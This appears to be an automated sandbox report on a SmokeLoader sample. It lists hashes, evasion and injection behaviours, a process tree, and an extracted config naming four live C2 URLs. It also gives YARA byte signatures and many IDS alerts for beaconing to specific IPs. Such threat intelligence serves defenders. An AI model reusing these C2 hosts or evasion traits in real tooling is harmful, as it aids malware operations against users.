Edit tour

Windows Analysis Report
3WaqgS34S7.exe

Overview

General Information

Sample name:	3WaqgS34S7.exe renamed because original name is a hash value
Original sample name:	F99E6584C274E6814B81BE68C0F2EE47.exe
Analysis ID:	1565628
MD5:	f99e6584c274e6814b81be68c0f2ee47
SHA1:	56c3838e6f68404b1309291639b3a300292a46b1
SHA256:	8e430af53d8eb61a39239d6537b7e8a2b99efb0852f8814ce1a5ebd7ace53fd4
Tags:	exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file overlay found

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

3WaqgS34S7.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\3WaqgS34S7.exe" MD5: F99E6584C274E6814B81BE68C0F2EE47)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

7E95.exe (PID: 5084 cmdline: C:\Users\user\AppData\Local\Temp\7E95.exe MD5: C56489FED27114B3EAD6D98FAD967C15)

vdhivcv (PID: 6764 cmdline: C:\Users\user\AppData\Roaming\vdhivcv MD5: F99E6584C274E6814B81BE68C0F2EE47)

wrhivcv (PID: 4048 cmdline: C:\Users\user\AppData\Roaming\wrhivcv MD5: C56489FED27114B3EAD6D98FAD967C15)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://obozintsev.ru/tmp/index.php", "http://olovge.at/tmp/index.php", "http://nuxc.cc/tmp/index.php", "http://piratekings.online/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000003.2776796462.0000000000890000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x390b:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x35fb:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x395d:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author
7.3.7E95.exe.890000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.7E95.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.7E95.exe.880e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\vdhivcv, CommandLine: C:\Users\user\AppData\Roaming\vdhivcv, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vdhivcv, NewProcessName: C:\Users\user\AppData\Roaming\vdhivcv, OriginalFileName: C:\Users\user\AppData\Roaming\vdhivcv, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\vdhivcv, ProcessId: 6764, ProcessName: vdhivcv

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T11:11:50.241243+0100	2028371	3	Unknown Traffic	192.168.2.4	50064	103.35.190.240	443	TCP
2024-11-30T11:13:12.097931+0100	2028371	3	Unknown Traffic	192.168.2.4	49791	23.145.40.181	443	TCP
2024-11-30T11:13:44.395105+0100	2028371	3	Unknown Traffic	192.168.2.4	49875	23.145.40.181	443	TCP
2024-11-30T11:14:56.054784+0100	2028371	3	Unknown Traffic	192.168.2.4	49949	207.246.75.248	443	TCP

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T11:12:26.661625+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49736	189.163.166.52	80	TCP
2024-11-30T11:12:28.539115+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49737	189.163.166.52	80	TCP
2024-11-30T11:12:30.464957+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49738	189.163.166.52	80	TCP
2024-11-30T11:12:32.393771+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49739	189.163.166.52	80	TCP
2024-11-30T11:12:34.315997+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49740	189.163.166.52	80	TCP
2024-11-30T11:12:36.283892+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49741	189.163.166.52	80	TCP
2024-11-30T11:12:38.493730+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49742	189.163.166.52	80	TCP
2024-11-30T11:12:40.415342+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49743	189.163.166.52	80	TCP
2024-11-30T11:12:42.336279+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49744	189.163.166.52	80	TCP
2024-11-30T11:12:44.476603+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49745	189.163.166.52	80	TCP
2024-11-30T11:12:46.397930+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49746	189.163.166.52	80	TCP
2024-11-30T11:12:48.544489+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49747	189.163.166.52	80	TCP
2024-11-30T11:12:50.425797+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49748	189.163.166.52	80	TCP
2024-11-30T11:12:52.340198+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49749	189.163.166.52	80	TCP
2024-11-30T11:12:54.211867+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49750	189.163.166.52	80	TCP
2024-11-30T11:12:56.083759+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49752	189.163.166.52	80	TCP
2024-11-30T11:12:57.964234+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49754	189.163.166.52	80	TCP
2024-11-30T11:12:59.830749+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49755	189.163.166.52	80	TCP
2024-11-30T11:13:01.802938+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49761	189.163.166.52	80	TCP
2024-11-30T11:13:03.676363+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49767	189.163.166.52	80	TCP
2024-11-30T11:13:05.644767+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49773	189.163.166.52	80	TCP
2024-11-30T11:13:07.570894+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49778	189.163.166.52	80	TCP
2024-11-30T11:13:09.507541+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49780	189.163.166.52	80	TCP
2024-11-30T11:13:15.257748+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49797	189.163.166.52	80	TCP
2024-11-30T11:13:17.454825+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49803	189.163.166.52	80	TCP
2024-11-30T11:13:19.374519+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49809	189.163.166.52	80	TCP
2024-11-30T11:13:21.288923+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49815	189.163.166.52	80	TCP
2024-11-30T11:13:23.209112+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49819	189.163.166.52	80	TCP
2024-11-30T11:13:25.128970+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49823	189.163.166.52	80	TCP
2024-11-30T11:13:27.270542+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49828	189.163.166.52	80	TCP
2024-11-30T11:13:29.204841+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49834	189.163.166.52	80	TCP
2024-11-30T11:13:31.076893+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49840	189.163.166.52	80	TCP
2024-11-30T11:13:33.046649+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49842	189.163.166.52	80	TCP
2024-11-30T11:13:34.998162+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49847	189.163.166.52	80	TCP
2024-11-30T11:13:36.925631+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49853	189.163.166.52	80	TCP
2024-11-30T11:13:39.051723+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49859	189.163.166.52	80	TCP
2024-11-30T11:13:41.033201+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49865	189.163.166.52	80	TCP
2024-11-30T11:13:42.994728+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49869	189.163.166.52	80	TCP
2024-11-30T11:13:47.602500+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49881	189.163.166.52	80	TCP
2024-11-30T11:13:49.522920+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49887	189.163.166.52	80	TCP
2024-11-30T11:13:51.429121+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49890	189.163.166.52	80	TCP
2024-11-30T11:13:53.395941+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49896	189.163.166.52	80	TCP
2024-11-30T11:13:55.345806+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49902	189.163.166.52	80	TCP
2024-11-30T11:13:57.270618+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49908	189.163.166.52	80	TCP
2024-11-30T11:13:59.357155+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49912	189.163.166.52	80	TCP
2024-11-30T11:14:01.341053+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49915	189.163.166.52	80	TCP
2024-11-30T11:14:03.218592+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49921	189.163.166.52	80	TCP
2024-11-30T11:14:05.094798+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49927	189.163.166.52	80	TCP
2024-11-30T11:14:07.246905+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49932	189.163.166.52	80	TCP
2024-11-30T11:14:09.171651+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49937	189.163.166.52	80	TCP
2024-11-30T11:14:11.136134+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49941	189.163.166.52	80	TCP
2024-11-30T11:14:13.297021+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49946	189.163.166.52	80	TCP
2024-11-30T11:14:15.211720+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49953	189.163.166.52	80	TCP
2024-11-30T11:14:17.129851+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49959	189.163.166.52	80	TCP
2024-11-30T11:15:29.907269+0100	2039103	1	A Network Trojan was detected	192.168.2.4	50061	123.213.233.131	80	TCP
2024-11-30T11:15:39.774346+0100	2039103	1	A Network Trojan was detected	192.168.2.4	50062	123.213.233.131	80	TCP
2024-11-30T11:15:50.872341+0100	2039103	1	A Network Trojan was detected	192.168.2.4	50065	123.213.233.131	80	TCP
2024-11-30T11:16:02.791232+0100	2039103	1	A Network Trojan was detected	192.168.2.4	50066	123.213.233.131	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://obozintsev.ru/tmp/index.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://obozintsev.ru/tmp/index.php", "http://olovge.at/tmp/index.php", "http://nuxc.cc/tmp/index.php", "http://piratekings.online/tmp/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\7E95.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\vdhivcv	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\wrhivcv	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: 3WaqgS34S7.exe	ReversingLabs: Detection: 63%
Source: 3WaqgS34S7.exe	Virustotal: Detection: 51%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\7E95.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F8FA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\wrhivcv	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\vdhivcv	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 3WaqgS34S7.exe

Joe Sandbox ML: detected

Source: 3WaqgS34S7.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\3WaqgS34S7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.145.40.181:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.181:443 -> 192.168.2.4:49875 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\wrhivcv

Code function: 8_2_0041D240 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLastError,GetLastError,GetStringTypeExA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoA,_calloc,_realloc,_malloc,_calloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,SetThreadContext,FindAtomA,_memset,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,ConnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,LocalAlloc,InterlockedDecrement,GetSystemTime,QueryMemoryResourceNotification,InterlockedDecrement,GetSystemTime,WriteConsoleOutputCharacterA,WriteConsoleOutputCharacterA,GetMonitorInfoA,GetClassLongW,GetMonitorInfoA,GetClassLongW,

8_2_0041D240

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49797 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49823 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49780 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49809 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49803 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49847 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49908 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49896 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49840 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49842 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49869 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49890 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49921 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49859 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49834 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49927 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49912 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49932 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49959 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49819 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49937 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49881 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49941 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49815 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49853 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49828 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49902 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49953 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49865 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49887 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49915 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49946 -> 189.163.166.52:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50061 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50065 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50066 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50062 -> 123.213.233.131:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.35.190.240 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 207.246.75.248 443	Jump to behavior
